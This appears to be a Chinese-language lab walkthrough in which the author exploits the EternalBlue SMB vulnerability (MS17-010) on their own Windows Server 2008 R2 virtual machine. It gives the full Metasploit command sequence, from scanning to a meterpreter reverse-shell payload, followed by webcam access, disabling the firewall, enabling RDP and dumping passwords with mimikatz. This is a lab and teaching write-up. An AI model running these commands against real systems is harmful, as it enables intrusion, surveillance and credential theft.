猫宁!!!
参考:
https://www.anquanke.com/post/id/86245
https://www.cnblogs.com/backlion/p/9484949.html
https://www.jianshu.com/p/91588e284fe8
“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限,危害极大。
微软的漏洞2个漏洞公告
https://support.microsoft.com/zh-cn/help/4012598/title
windows 2008R2镜像从itellme站点获取,种类齐全,比较干净。
记得进行新建,建立系统保留分区哦,用于存放系统引导文件,类似于centos7的/boot分区,可以避免系统无法正常启动。
虚拟机中的Windows 2008 R2一定要设置为网卡桥接模式
ip是192.168.100.27,先用nmap扫描一下有没有永恒之蓝漏洞存在,扫描脚本在/usr/share/nmap/scripts/
nmap --script smb-vuln-ms17-010.nse 192.168.100.27,表明开启了445端口,存在漏洞。
msfconsole,启动MSF
search ms17_010
use auxiliary/scanner/smb/smb_ms17_010,使用POC进行扫描
set RHOST 192.168.100.27
run
证实存在漏洞
use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.100.27
run
竟然把服务器给打重启了,没有连接上去
show payloads,看一下更多种类的payload,46个
show targets,显示适用的目标
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp,这个payload非常有助于后期的植入后门进行权限维持。
set RHOST 192.168.100.27
run
成功进入服务器系统
screenshot,截屏
webcam_scream,可以开启摄像头
run post/windows/manage/enable_rdp,开启远程桌面并关闭防火墙
shell,直接进入系统
load mimikatz,加载密码读取工具
wdigest,成功获取我的密码
rdesktop 192.168.100.27 -u Administrator -p 111aaabbb!!!
远程连接服务器就好了
arp查看内网情形
获得当前木马进程,getid
ps查看
获取用户的身份和权限
判断服务器是不是被人在使用
run和bgrun,有大量的帮助文件
sysinfo,显示计算机信息